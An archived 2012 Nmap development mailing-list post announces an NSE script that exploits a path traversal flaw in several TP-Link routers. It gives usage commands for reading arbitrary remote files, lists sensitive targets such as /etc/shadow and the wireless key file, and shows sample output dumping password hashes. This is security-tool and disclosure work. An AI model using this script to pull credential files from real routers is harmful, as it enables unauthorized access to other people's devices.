Home page logo
/

nmap-dev logo Nmap Development mailing list archives

http-tplink-dir-traversal.nse : Exploits path traversal vulnerability affecting several TP-Link wireless router models
From: Paulino Calderon <paulino () calderonpale com>
Date: Thu, 28 Jun 2012 00:48:44 -0500

-------- Original Message --------
Subject: http-tplink-dir-traversal.nse : Exploits path traversal vulnerability affecting several TP-Link wireless router models
Date:   Thu, 28 Jun 2012 00:25:17 -0500
From:   Paulino Calderon <paulino () calderonpale com>
To:     Nmap Dev <nmap-dev () insecure org>



Hi list,

description = [[
Exploits a directory traversal vulnerability existing in several TP-Link
wireless routers. Attackers may exploit this vulnerability to read any
of the configuration and password files.

This vulnerability was confirmed in models WR740N and WR740ND but there
are several models that use the same HTTP server so I believe they could
be vulnerable as well. I appreciate
any help confirming the vulnerability in other models.

Advisory:
*
http://websec.ca/advisories/view/path-traversal-vulnerability-tplink-wdr740

Other interesting files:
* /tmp/topology.cnf (Wireless configuration)
* /tmp/ath0.ap_bss (Wireless encryption key)
]]

---
-- @usage nmap -p80 --script http-tplink-dir-traversal.nse <target>
-- @usage nmap -p80 -Pn -n --script http-tplink-dir-traversal.nse <target>
-- @usage nmap -p80 --script http-tplink-dir-traversal.nse --script-args
rfile=/etc/topology.conf -d -n -Pn

--
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- | http-tplink-dir-traversal:
-- |   VULNERABLE:
-- |   Path traversal vulnerability in several TP-Link wireless routers
-- |     State: VULNERABLE (Exploitable)
-- |     Description:
-- |       Some TP-Link wireless routers are vulnerable to a path
traversal vulnerability that allows attackers to read configurations or
any other file in the device.
-- |       This vulnerability can be exploited without authenticatication.
-- |       Confirmed vulnerable models: WR740N, WR740ND
-- |       Possibly vulnerable (Based on the same firmware):
WR743ND,WR842ND,WA-901ND,WR941N,WR941ND,WR1043ND,WR2543ND,MR3220,MR3020,WR841N.
-- |     Disclosure date: 2012-06-18
-- |     Extra information:
-- |       /etc/shadow :
-- |
-- |   root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
-- |   Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
-- |   bin::10933:0:99999:7:::
-- |   daemon::10933:0:99999:7:::
-- |   adm::10933:0:99999:7:::
-- |   lp:*:10933:0:99999:7:::
-- |   sync:*:10933:0:99999:7:::
-- |   shutdown:*:10933:0:99999:7:::
-- |   halt:*:10933:0:99999:7:::
-- |   uucp:*:10933:0:99999:7:::
-- |   operator:*:10933:0:99999:7:::
-- |   nobody::10933:0:99999:7:::
-- |   ap71::10933:0:99999:7:::
-- |
-- |     References:
-- |_
http://websec.ca/advisories/view/path-traversal-vulnerability-tplink-wdr740
--
-- @args http-tplink-dir-traversal.rfile Remote file to download.
Default: /etc/passwd
-- @args http-tplink-dir-traversal.outfile If set it saves the remote
file to this location.
--

--
Paulino Calderón Pale
Website: http://calderonpale.com
Twitter: http://twitter.com/calderpwn





Attachment: http-tplink-dir-traversal.nse
Description:

_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/

  By Date           By Thread  

Current thread:
  • http-tplink-dir-traversal.nse : Exploits path traversal vulnerability affecting several TP-Link wireless router models Paulino Calderon (Jun 28)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault